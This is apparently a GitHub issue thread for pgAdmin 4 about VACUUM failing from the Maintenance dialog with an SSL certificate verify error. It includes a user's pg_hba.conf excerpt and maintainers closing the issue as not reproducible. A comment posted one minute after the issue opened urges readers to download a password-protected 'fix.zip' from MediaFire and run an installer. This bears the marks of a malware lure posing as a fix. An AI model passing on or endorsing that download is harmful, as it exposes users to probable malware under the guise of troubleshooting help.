### ISSUE TITLE
Vacuum fails with certificate verify error

### ISSUE THREAD

**Issue by jgm1972** [pgadmin-org/pgadmin4#7875] opened 2024-08-29 14:47 UTC
**Describe the bug**

1. Use pgadmin to connect to a remote db, behind a proxy server, with a root certificate that has the intermediate certificate appended to it.  
2.  sslmode=verify-full with a pgpass file.
3. Right click on a table and select maintenance 
4. Vacuum with the analyze option(the options don't matter, it always fails)

**Expected behavior**

The vacuum will complete.  Note, I am able to vacuum the same table with pgadmin if I right click, select PSQL tool, then enter 
VACUUM (VERBOSE, ANALYZE) tablename;

**Error message**

VACUUM on table 'tablename' of server servername (xx.xxx.xx.xx:5432)
Running query:
VACUUM (VERBOSE, ANALYZE) tablename;
 Start time: Thu Aug 29 2024 10:27:17 GMT-0400 (Eastern Daylight Time)
psql: error: connection to server at "xx.xxx.xx.xx", port 5432 failed: SSL error: certificate verify failed
connection to server at "xx.xxx.xx.xx", port 5432 failed: FATAL: no pg_hba.conf entry for host "yy.yyy.yyy.yy", user "postgres", database "dbname", no encryption

**Desktop (please complete the following information):**
 - OS:Windows-10-10.0.19045-SP0
 - Version: 8.11
 - Mode: Desktop
 - Browser Chrome 128.0.6613.36
 - Package type: Windows
 - 
**Additional context**
I can vacuum tables through the maintenance window on another server that doesn't require ssl and a certificate.

My pg_hba.conf looks like this:
TYPE  DATABASE        USER            ADDRESS                 METHOD

"local" is for Unix domain socket connections only
local   all             all                                     peer
IPv4 local connections:
hostssl    all             all             yy.yyy.yyy.yy/24        scram-sha-256
host    all             all             127.0.0.1/32            scram-sha-256
IPv6 local connections:
host    all             all             ::1/128                 scram-sha-256
Allow replication connections from localhost, by a user with the replication privilege.
local   replication     all                                     peer
host    replication     all             127.0.0.1/32            scram-sha-256
host    replication     all             ::1/128                 scram-sha-256

**Comment by wahyu-n** [comment] 2024-08-29 14:48
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yogeshmahajan-1903** [comment] 2024-09-09 11:23
@jgm1972 
I am not able to reproduce the issue. Can you please share pgadmin logs for the same error? Connection created in the object explorer is only used to create the maintenance job. Also what all parameters you have specified in pgpass file?

**Comment by jgm1972** [comment] 2024-09-09 14:11
I cannot access the parameters in the pgpass file or the pgadmin logs because I was laid off about 1 hour after posting this issue. Unfortunate, but a complete coincidence.

**Comment by yogeshmahajan-1903** [comment] 2024-09-11 12:12
Unfortunately, I am not able to reproduce the issue and also not able to get reproduction steps. Hence closing the issue.

**Closed by yogeshmahajan-1903** 2024-09-11 12:12 UTC
Labels: Bug, EDB Sprint 177
